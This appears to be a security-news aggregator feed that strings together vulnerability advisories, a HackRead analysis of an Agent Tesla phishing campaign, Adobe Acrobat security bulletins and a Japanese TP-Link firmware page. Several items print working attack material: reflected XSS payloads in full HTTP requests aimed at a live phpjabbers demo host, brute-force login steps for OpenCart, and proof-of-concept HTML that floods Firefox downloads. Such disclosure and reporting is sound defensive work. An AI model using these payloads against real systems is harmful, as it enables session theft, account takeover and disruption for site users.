Windows still suffers from issues related to the replacement of the system drive letter during impersonation. This can be abused to trick privilege processes to load configuration files and other resources from untrusted locations leading to elevation of privilege.

Microsoft Windows Privilege Escalation

OpenCart CMS version 4.0.2.2 suffers from a login brute forcing vulnerability.

    # Exploit Title: OpenCart CMS v4.0.2.2 Login Vulnerability# Date: 5-9-2023# Category: Web Application [CMS]# Exploit Author: Rajdip Dey Sarkar# Version: 4.0.2.2# Tested on: Windows/Kali# CVE: CVE-2023-40834Description:----------------OpenCart CMS version 4.0.2.2 is susceptible to login brute-force attacks,where attackers can repeatedly try to guess login credentials without anyprotective mechanisms in place.Vulnerable Parameter:-----------------------`Password`Steps to reproduce:---------------------> Initial Login Attempt: An attacker visits the login page `http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb`<http://localhost/opencart-4.0.2.2/index.php?route=account/login&language=en-gb>andenters a valid username along with an incorrect password to trigger anauthentication attempt.> Request Capture: The attacker intercepts the HTTP request sent to theserver during the failed login attempt using tools like proxy servers. Thiscaptured request contains the authentication details.> Request Modification: The attacker uses a tool like "Intruder" toautomate the process of submitting multiple password variations. Theymodify the captured request to include different passwords, including thecorrect one, to be used in the brute force attack.> Brute Force Attack: The attacker launches the brute force attack bysending the modified requests with different password combinations to theserver. They analyze the responses to identify differences in responselengths or messages that reveal the correct password, account lockoutinformation, or other vulnerabilities.

OpenCart CMS 4.0.2.2 Brute Force

Cleaning Business Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cleaning Business Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/cleaning-business-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The payload ys2hj"><script>alert(1)</script>u8zwj was submitted in theindex parameter. This input was echoed unmodified in the application'sresponse.The attacker can get all cookie information about the user session!STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1693971587_409/index.php?controller=pjFront&action=pjActionServices&locale=1&index=3514ys2hj%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu8zwjHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: CleaningBusiness=v1s3db2187im339fcbqifuabg7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cleaning-Business-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cleaning-business-software-10-xss.html)## Time spent:00:25:00

Cleaning Business Software 1.0 Cross Site Scripting

Event Booking Calendar version 4.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Booking Calendar-4.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The payload ap5yf"><script>alert(1)</script>n9d5d was submitted in theindex parameter. This input was echoed unmodified in the application'sresponse.The attacker can make a specially crafted malicious URL and spread itinto the network, to infect every user of this system who clicks on itand visit it.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1693985138_790/index.php?controller=pjFrontPublic&action=pjActionLoadEvents&session_id=&theme=theme7&locale=1&hide=0&index=4786ap5yf%22%3e%3cscript%3ealert(1)%3c%2fscript%3en9d5d&show_header=1&show_icons=1&show_categories=1&category_id=0&month=09&year=2023&view=calendar&period=&page=1HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.1968270768.1693986414;_gid=GA1.2.227754763.1693986414; _gat=1;_fbp=fb.1.1693986413650.1548084853;_ga_NME5VTTGTT=GS1.2.1693986413.1.0.1693986413.60.0.0X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1693985138_790/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Booking-Calendar-4.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-booking-calendar-40-xss-reflected.html)## Time spent:01:25:00

Event Booking Calendar 4.0 Cross Site Scripting

Firefox version 117 suffers from a file creation denial of service vulnerability.

    This is barely a DoS, but since Chrome has explicit protectionagainst it, we decided to disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA.Technically about the PoC:  create non-empty file `xml.doc`.To force download, add to the page `iframe src="xml.doc"`.To force creation of new files, add `body onload="location.reload()"`(there are several other options about this).[Proof of concept][1]To out surprise, Chrome is safe from this and it distinguishesmanual download from automated download and this might be becauseit is aware about this DoS.Affected:  firefox 117 on GNU/Linux and reportedly on Windows.Not Affected:  firefox on android, Chrome, lynx.[1]: https://j.ludost.net/y3.html--- poc y3.html ---<html><body>Wait about 20 seconds andcheck for new files in ~/Downloads and also for message from firefox. Written by Georgi Guninski.<iframe src="xml.doc" width=10 height=10></iframe><script>setInterval(function () {location.reload()},1000);</script></body></html>--- poc y3.html ---

Firefox 117 Denial Of Service

Cinema Booking System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cinema Booking System-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/05/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/car-rental-script/## Reference: https://portswigger.net/web-security/sql-injection## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks. The payload kfimq"><script>alert(1)</script>k0a57 wassubmitted in the name of an arbitrarily supplied URL parameter. Thisinput was echoed unmodified in the application's response. Theattacker can trick all users of this system into visiting a veryDANGEROUS URL address, and the worst thing is when they try to log into this system, by using his malicious link!STATUS: HIGH-CRITICAL Vulnerability[+]Testing Payload:```GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLoginHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)## Time spent:00:17:00

Cinema Booking System 1.0 Cross Site Scripting

By Deeba Ahmed
FortiGuard Discovers Phishing Campaign Distributing New Agent Tesla Variant to Windows Devices.
This is a post from HackRead.com Read the original post: New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs

The new Agent Tesla variant exploits CVE-2017-11882/CVE-2018-0802 vulnerability to execute the malware. 

**Key Findings**

*   **A new variant of the Agent Tesla malware family is being used in a phishing campaign.**

*   **The malware can steal credentials, keylogging data, and active screenshots from the victim’s device.**

*   **The malware is spread through a malicious MS Excel attachment in phishing emails.**

*   **The malware exploits an old security vulnerability (CVE-2017-11882/CVE-2018-0802) to infect Windows devices.**

*   **The malware ensures persistence even when the device is restarted or the malware process is killed.**

**New Agent Tesla Variant Detected in Malicious Phishing Campaign**

FortiGuard Labs threat researchers have detected a new variant of the notorious Agent Tesla malware family used in a phishing campaign. Report author Xiaopeng Zhang revealed that the malware can steal “credentials, keylogging data, and active screenshots” from the victim’s device. Stolen data is transferred to the malware operator through email or SMTP protocol. The malware mainly infects Windows devices.

For your information, Agent Tesla malware is also offered as a Malware-as-a-Service tool. The malware variants use a data stealer and .NET-based RAT (remote access trojan) for initial access.

**How Phishers Trap Users?**

This is a phishing campaign, so initial access is gained through a phishing email designed to trick users into downloading the malware. The email is a Purchase Order notification that asks the recipient to confirm their order from an industrial equipment supplier.

The email contains a malicious MS Excel attachment titled Order 45232429.xls. This document is in OLE format and contains crafted equation data that exploits an old security RCE vulnerability tracked as CVE-2017-11882/CVE-2018-0802 instead of using a VBS macro.

This vulnerability causes memory corruption in the EQNEDT32.EXE process and allows arbitrary code execution through ProcessHollowing method, in which a hacker replaces the executable file’s code with malicious code.

A shellcode download/execute the Agent Tesla file (dasHost.exe) from this link “hxxp://2395.128.195/3355/chromium.exe” onto the targeted device. It is a .NET program protected by IntelliLock and .NET Reactor. Relevant modules are encrypted/encoded in the Resource section to prevent its core module from detection and analysis.

It is worth noting that Microsoft released fixes for this vulnerability in November 2017 and January 2018. However, it is still being exploited by threat actors indicating the presence of unpatched devices. Per FortiGuard research, they observe around 1300 vulnerable devices daily and mitigate 3,000 attacks at the IPS level per day.

The phishing email and the ShellCode identified by the researchers (Screenshots: FortiGuard Labs)

**Analysis of Agent Tesla Activities**

According to FortiGuard Labs’ report, published on 5 Sep 2023, Agent Tesla variant steals stored credentials from web browsers, email clients, FTP clients, etc. There is a long list of targeted software and email clients available here.

The malware sets a keyboard hook through the API SetWindowsHookEx() to monitor low-level keyboard inputs and calls the callback hook procedure “this.EiqpViCm9()” whenever the victim types something on the device. The malware steals the program title, time, and input contents at regular intervals. A Timer calls a method to check the log.tmp file every 20 seconds and sends the info to the attacker via STMP. Moreover, the malware uses another Timer with a 20-minute interval to check for device activities and determine when to capture screenshots.

**How does Agent Tesla maintain persistence?**

Agent Tesla malware ensures persistence even when the device is restarted, or the malware process is killed, using two methods. It either executes a command for creating a task in the TaskScheuler system in the payload module or adds an auto-run item in the system registry. These methods allow duplication of dasHost.exe to launch automatically when the system restarts.

**Protection against such campaigns**

**Be suspicious of any email that asks for your personal or financial information:** Phishing emails often try to trick you into giving up your passwords, credit card numbers, or other sensitive information. Never click on links or open attachments in emails from senders you don’t know or trust.

**Keep your software up to date**: Software updates often include security patches that can help protect you from malware. Make sure to install security updates as soon as they are available.

**Use a strong antivirus and anti-malware program**: Antivirus and anti-malware programs can help detect and remove malware from your computer. Keep your antivirus and anti-malware programs up to date and scan your computer regularly.

**Be careful what you click on**: Phishing emails often contain links that lead to malicious websites. If you click on a link in an email, make sure to check the URL carefully before visiting the website.

**Use a spam filter**: A spam filter can help reduce the number of phishing emails that you receive.

**Educate yourself about phishing**: The more you know about phishing, the better you will be able to spot it. Read up on phishing scams and how to protect yourself.

1.  Hackers leak logins of vulnerable Fortinet SSL VPNs
2.  Hackers Using Stolen Ivacy VPN Certificate To Sign Malware
3.  Smoke Loader Drops Location Tracker Whiffy Recon Malware
4.  Luna Grabber Malware Hits Roblox Devs Using npm Packages
5.  Chae$4 Malware Steals Login, Financial Data from Businesses
6.  Adobe ColdFusion Vulnerabilities Exploited to Deploy Malware

New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs

Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Path traversal vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available  for Adobe Acrobat and Reader | APSB21-51

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

CVSS base score   

**CVSS vector**  

**CVE Number**

Out-of-bounds Read 

(CWE-125)   

Memory leak

Important  

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-35988

CVE-2021-35987  

Path Traversal

(CWE-22)  

Arbitrary code execution  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-35980

CVE-2021-28644  

Use After Free

(CWE-416)  

Arbitrary code execution   

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28640  

Type Confusion

(CWE-843)  

Arbitrary code execution   

Critical  

7.8   

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28643  

Use After Free

(CWE-416)  

Arbitrary code execution   

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28641

CVE-2021-28639  

Out-of-bounds Write

(CWE-787)  

Arbitrary file system write  

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28642  

Out-of-bounds Read

(CWE-125)  

Memory leak  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28637  

Type Confusion

(CWE-843)  

Arbitrary file system read  

Important  

4.3  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-35986  

Heap-based Buffer Overflow

(CWE-122)  

Arbitrary code execution   

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28638  

NULL Pointer Dereference

(CWE-476)  

Application denial-of-service  

Important  

5.5  

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H  

CVE-2021-35985

CVE-2021-35984  

Uncontrolled Search Path Element

(CWE-427)  

Arbitrary code execution   

Critical  

7.3  

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28636  

OS Command Injection

(CWE-78)  

Arbitrary code execution   

Critical  

8.2  

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H  

CVE-2021-28634  

Use After Free 

(CWE-416)

Arbitrary code execution   

Critical  

7.8   

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H   

CVE-2021-35983

CVE-2021-35981

CVE-2021-28635

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:   

*   Nipun Gupta , Ashfaq Ansari and Krishnakant Patil - CloudFuzz working with Trend Micro Zero Day Initiative (CVE-2021-35983) 
*   Xu Peng from UCAS and Wang Yanhao from QiAnXin Technology Research Institute working with Trend Micro Zero Day Initiative (CVE-2021-35981, CVE-2021-28638)
*   Habooblabs (CVE-2021-35980, CVE-2021-28644, CVE-2021-35988, CVE-2021-35987, CVE-2021-28642, CVE-2021-28641, CVE-2021-35985, CVE-2021-35984, CVE-2021-28637)
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-28643, CVE-2021-35986)
*   o0xmuhe (CVE-2021-28640)
*   Kc Udonsi (@glitchnsec) of Trend Micro Security Research working with Trend Micro Zero Day Initiative (CVE-2021-28639)
*   Noah (howsubtle) (CVE-2021-28634)
*   xu peng (xupeng\_1231) (CVE-2021-28635)
*   Xavier Invers Fornells (m4gn3t1k) (CVE-2021-28636)

July 14, 2021: Updated acknowledgement details for CVE-2021-28640.

July 15, 2021: Updated acknowledgement details for CVE-2021-35981.  

July 29, 2021: Updated the CVSS base score and the CVSS vector for CVE-2021-28640, CVE-2021-28637, CVE-2021-28636.  
July 29, 2021: Updated the Vulnerability Impact, Severity, CVSS base score and the CVSS vector for CVE-2021-35988, CVE-2021-35987, CVE-2021-35987, CVE-2021-28644

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-28644: Adobe Security Bulletin

Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader | APSB21-55

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.  

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

CVSS base score   

**CVSS vector**  

**CVE Number**

Type Confusion (CWE-843)

Arbitrary code execution

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-39841

Heap-based Buffer Overflow

(CWE-122)

Arbitrary code execution

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-39863

Information Exposure

(CWE-200)

Arbitrary file system read

Moderate

6.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2021-39857

CVE-2021-39856

CVE-2021-39855

Out-of-bounds Read

(CWE-125)

Memory leak

Critical   

7.7

CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:H

CVE-2021-39844

Out-of-bounds Read

(CWE-125)

Memory leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2021-39861

Out-of-bounds Read

(CWE-125)

Arbitrary file system read

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-39858

Out-of-bounds Write

(CWE-787)

Memory leak

Critical 

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-39843

Stack-based Buffer Overflow 

(CWE-121)

Arbitrary code execution

Critical   

6.1

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

CVE-2021-39846

CVE-2021-39845

Uncontrolled Search Path Element

(CWE-427)

Arbitrary code execution

Important 

7.3

CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2021-35982

Use After Free

(CWE-416)

Arbitrary code execution

Important

4.4

CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

CVE-2021-39859

Use After Free

(CWE-416)

Arbitrary code execution

Critical 

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-39840

CVE-2021-39842

CVE-2021-39839

CVE-2021-39838

CVE-2021-39837

CVE-2021-39836

NULL Pointer Dereference (CWE-476)

Memory leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2021-39860

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H  

CVE-2021-39852

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Important

5.5

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-39854

CVE-2021-39853

CVE-2021-39850

CVE-2021-39849

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Important  

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H  

 CVE-2021-39851

Use After Free

(CWE-416)

Arbitrary code execution  

Critical     

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-40725

Use After Free

(CWE-416)

Arbitrary code execution  

Critical     

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-40726  

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:   

*   Mark Vincent Yason (@MarkYason) working with Trend Micro Zero Day Initiative (CVE-2021-39841, CVE-2021-39836, CVE-2021-39837, CVE-2021-39838, CVE-2021-39839, CVE-2021-39840, CVE-2021-40725, CVE-2021-40726)
*   Haboob labs (CVE-2021-39859, CVE-2021-39860, CVE-2021-39861, CVE-2021-39843, CVE-2021-39844, CVE-2021-39845, CVE-2021-39846)
*   Robert Chen (Deep Surface<https://deepsurface.com/\>) **(**CVE-2021-35982)
*   XuPeng from UCAS and Ying Lingyun form QI-ANXIN Technology Research Institute (CVE-2021-39854, CVE-2021-39853, CVE-2021-39852, CVE-2021-39851, CVE-2021-39850, CVE-2021-39849)
*   j00sean (CVE-2021-39857, CVE-2021-39856, CVE-2021-39855, CVE-2021-39842)
*   Exodus Intelligence (exodusintel.com) and Andrei Stefan (CVE-2021-39863)  
    
*   Qiao Li Of Baidu Security Lab working with Trend Micro Zero Day Initiative (CVE-2021-39858)

September 20, 2021: Updated acknowledgement details for CVE-2021-35982.

September 28, 2021: Updated acknowledgement details for CVE-2021-39863.

October 5, 2021: Updated CVSS base score, CVSS vector, and Severity for CVE-2021-39852, CVE-2021-39851, CVE-2021-39863, CVE-2021-39860, CVE-2021-39861. Added data and acknowledgements for CVE-2021-40725 and CVE-2021-40726.

January 18th, 2022: Updated acknowledgement details for CVE-2021-39854, CVE-2021-39853, CVE-2021-39852, CVE-2021-39851, CVE-2021-39850, CVE-2021-39849

January 27th, 2022: Updated CVSS details for CVE-2021-39845, CVE-2021-39846, CVE-2021-39855, CVE-2021-39856, CVE-2021-39860, CVE-2021-39861  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-39859: Adobe Security Bulletin

Archer C50 firmware versions prior to 'Archer C50(JP)_V3_230505' and Archer C55 firmware versions prior to 'Archer C55(JP)_V1_230506' use hard-coded credentials to login to the affected device, which may allow a network-adjacent unauthenticated attacker to execute an arbitrary OS command.

**セットアップビデオ**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **TP-Link wireless router quick setup**
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

****ファームウェア****

ファームウェアアップデートにより、過去のバージョンと比較しパフォーマンス向上や不具合等が修正される可能性がございます。

****アップグレードの際に****

**注意:** アップグレードエラーを防ぐために、アップグレードして頂く前にご覧ください。

*   お使いの機器のハードウェアバージョンをファームウェアバージョンを確認してください。  
    異なるファームウェアアップグレードをされますと、機器に不具合や異常を与える可能性があります。（ 通常は　V1.x=V1）  
    ※また保証対象外にもなります。 お住いの地域以外の選択はお勧めできません。  
      こちらをクリックしお住いの地域を選択し、適切なファームウェアバージョンをダウンロードしてください。  
    （　例　EUとUSのファームウェアは異なるハードウェアバージョンです）
*   アップグレード中は電源を切らないでください。  
    もし電源を切ってしまった場合、製品が永続的に不具合や異常が生じてしまう可能性がございます。
*   ファームアップグレードをワイヤレス接続経由で行わないでください。※TP-LINK製品がワイヤレス機能のみしか無い場合を除いて
*   全てのインターネット接続されているアプリケーションを停止して頂くか、インターネット回線に接続されている端末をアップグレード前に切断して頂くことを推奨いたします。
*   WinZIPやWinRAR等の解凍ソフトウェアを使用し、アップグレード前にダウンロードされたファイルを解凍してください。

More Fold

Archer C50(JP)\_V3\_230505

ダウンロード

**Important Notice**

Please upgrade firmware/software from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it may cause upgrade failure or mistakes and be against the warranty.

Still Download  Go to Local Website

公開日: 2023-05-25

言語: 多言語

ファイル サイズ: 7.40 MB

リリースノート：

デバイスのセキュリティが向上しました。

Archer C50(JP)\_V3\_180423

ダウンロード

公開日: 2018-07-24

言語: 日本語

ファイル サイズ: 6.77 MB

修正点とバグの修正:  
1\. WPA2 (KRACKs)脆弱性問題に対応しました。  
2\. Facebook WiFi機能を追加しました。  
注意:  
Archer C50 JP v3専用

Archer C50(JP)\_V3\_171011

ダウンロード

公開日: 2017-12-21

言語: 日本語

ファイル サイズ: 5.61 MB

Modifications and Bug Fixes:

新機能/改善点  
1.ブリッジ(アクセスポイント)モードの追加  
2.ステータスLED点灯スケジュール機能の追加

**サードパーティー製のファームウェアをTP-Link製品で使用して頂く際に、ご覧ください。**

いくつかのTP-LINKの公式ファームウェアはサードパーティーファームウェア（DD-WRT等）に置き換えることが出来ますが、TP-Linkは非公式ファームウェアのメンテナンスやサポートは致しません。またサードパーティー製のファームウェアのパフォーマンスや安定性の保証は致しません。 サードパーティー製のファームウェアを使用して製品に万が一不具合等が生じしてしまった場合、保証対象外になり、弊社はその責任を一切負わないものとします。

**プログラマーの方へ オープンソースコード(GPL)**

こちらは主にプログラマーの方への情報であり、大多数のTP-Linkホームユーザーには必要ございません。

一部のTP-LINKのソフトウェアコードはサードパーティーのコードを含みます。 GNU General Public Licence(“GPL“)のソフトウェアのタイトル、Version 1/Version 2/Version 3、またはGNU Lesser General Public License("LGPL")等("LGPL"). それぞれのGPLライセンス規約下において、各ソフトウェアをご利用できます。

GPL licence規約の印刷、閲覧、ダウンロードはこちらからできます。 ダイレクトダウンロードや情報詳細のために、TP-LINK製品で使用されているGPLソースコードを受理することになります、 ※TP-LINKソフトウェアGPLソフトウェアコード（GPLコードセンター下）を含む  GPL Code Center.

この配布されたプログラムは保証がございません。 商業可能性の保証や特定目的への適合性は、言外に示されたものも 含め、全く存在しません。詳しくはGNU 一般公衆利用許諾書をご覧ください。 個々のGNUライセンスをご覧ください。

**アプリ**

TP-Link Tether

TP-LinkのTetherアプリはiOSデバイスまたはAndroidデバイスから、インターネットを管理するための最も簡単な方法を提供します。TP-Link Tetherアプリに関する詳細はこちらから。対象製品はこちら。

注意：Tetherアプリを使用する際は、対象製品のファームウェアが最新のバージョンに更新されていることを確認してください。

**エミュレータ**

ファームウェア バージョン

動作モード

言語

170825

\-

日本語

ブラウズ

**注:**

1\. このエミュレーターは、TP-Link 製品ファームウェアのWebUIを確認できる仮想 Web GUI です。個々の製品の機能や仕様の詳細については、検索機能を使用するか、製品ページを参照してください。エミュレータに存在する機能が、実機に備わっているとは限りません。

2\. ファームウェア バージョンがエミュレーターのインターフェイスに表示されているバージョンと一致することを確認してくだださい。各ファームウェア バージョンには、特有の GUI および機能があります。

3\. すべてのファームウェア バージョンをエミュレーターで使用できるわけではありません。

4.ログイン用IDとパスワードを求められる場合は、共に「admin」と入力してください。

**5.エミュレーターで行った操作は､実際の製品には反映されません｡エミュレーターは､製品の設定画面を模したものです｡**

**ここでルーターや中継器の設定はできません｡**

Tag

#windows